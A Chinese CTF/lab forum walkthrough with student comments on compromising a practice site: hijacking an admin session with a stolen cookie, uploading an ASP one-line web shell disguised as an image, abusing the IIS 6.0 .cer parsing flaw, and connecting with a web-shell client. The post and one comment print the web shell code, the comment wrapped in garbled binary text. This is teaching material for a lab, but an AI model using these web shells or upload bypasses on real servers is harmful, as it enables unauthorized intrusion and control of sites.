靶场第五关解题思路--Get Shell! — 绕过防护上传木马

Track-聂风   ·   发表于 2018-05-18 19:13:03   ·   CTF&WP专版

PPT、课件已打包至附件! 

直播回放观看:https://ke.qq.com/webcourse/index.html#course_id=275794&term_id=100326238&taid=2183187711407442&vid=f1425nhgbnh


看了题目和Tips,这题是需要我们用上一题窃取的cookie来登录后台然后上传WEBSHELL,然后连接菜刀获取flag。


先找到上一题打来的cookie。


ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC


然后按F12选择Application,然后看右边有一个cookies然后选择我们的题目的地址,然后点击空白的地方,


把ADMINSESSIONIDCSTRCSDQ粘贴在Name下LBMLMBCCNPFINOANFGLPCFBC粘贴在value


(浏览器可能会有差异,我是谷歌浏览器,不懂可以百度下非常简单)


然后点准备好了吗或者F5刷新页面,成功进入

然后我们直接找上传点,毕竟getshell我们是需要在服务器的WWW文件夹里面放一段恶意代码的。


我们先去百度找ASP一句话木马,因为是ASP的环境


ASP一句话木马:<%eval request ("pass")%> 密码是pass eval是个函数,request是接受参数的。有兴趣了解一句话的可以自行百度或者私聊我。


一般而言直接传木马文件都很可能被拦截,所以一般而言一句话木马都会做成图片马。图片马制作非常简单,一条CMD命令就可以了


具体的可以去http://bbs.zkaq.cn/?t/159.html 查看 然后我们成功的得到了图片马


找到上传点

我们修改产品管理里面的产品

文件存在然后上菜刀。菜刀打开右键添加,地址就写文件地址,边上的框框写密码,我的就是pass,记得选择脚本格式


然后我们双击去访问,丢了一个405报错。这是因为jpg文件不解析,因为你的后缀是图片格式,所以服务器会当做一张图片去读取,而不是代码。


就和你把一个图片后缀改为TXT然后打开里面的东西都会当文本读取而不是图片。


报错信息里面写了iis6.0的中间件。百度下iis6.0的解析漏洞,就能发现上传cer文件,iis6.0会解且执行。


然后把图片马名字改为cer上传,成功上传,然后菜刀连接,成功进入,然后滚轮划一下就能看到flag!.txt,然后双击打开就是flag了。






打赏我,让我更有动力~

34 Reply   |  Until 1个月前 | 33615 View

codegod
发表于 2020-3-25

社区 个人中心里 其中 修改图片 可不可 上传木马

评论列表

  • 加载数据中...

编写评论内容

qqq121027
发表于 2020-9-11

#### 空的,是被人删了么?

评论列表

  • 加载数据中...

编写评论内容

和谐文明
发表于 2020-9-15

不知道咋回事 F5刷新页面不变!果断退出在登录靶场,直接看到登录页面???喵喵

评论列表

  • 加载数据中...

编写评论内容

菜包子
发表于 2020-12-24

我改了cookie
为什么里面点击产品管理没反应?

评论列表

  • 加载数据中...

编写评论内容

nemo
发表于 2021-3-22

为什么我尝试打开flag.txt会报没有权限

评论列表

  • 加载数据中...

编写评论内容

郎贤坤
发表于 2021-8-15

老师,E盘怎么显示有错误啊

评论列表

  • 加载数据中...

编写评论内容

忍荷
发表于 10个月前

点击E盘,报操作完成,但有错误发生了。

评论列表

  • 加载数据中...

编写评论内容

zhan
发表于 6个月前


用菜刀连上后只有D盘,为什么没有C盘

评论列表

  • 加载数据中...

编写评论内容

zhan
发表于 6个月前


用菜刀连上后只有D盘,为什么没有C盘

评论列表

  • 加载数据中...

编写评论内容

zhan
发表于 6个月前


用菜刀连上后只有D盘,为什么没有C盘

评论列表

  • 加载数据中...

编写评论内容

wangtao
发表于 4个月前


刷新了还是进去不,是什么问题呢

评论列表

  • 加载数据中...

编写评论内容

wangtao
发表于 4个月前


刷新了还是进不去,是什么问题呢

评论列表

  • 加载数据中...

编写评论内容

hackerboy
发表于 3个月前

侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 <%execute(request("pass"))%> 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍

moyu.cer的内容
还有flag。txt打不开

评论列表

  • 加载数据中...

编写评论内容

gun123456789
发表于 1个月前

我宣布个事啊,我是**
我用HTTPS连了半天,焯

评论列表

  • 加载数据中...

编写评论内容
首页 1 2 / 2 跳转
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.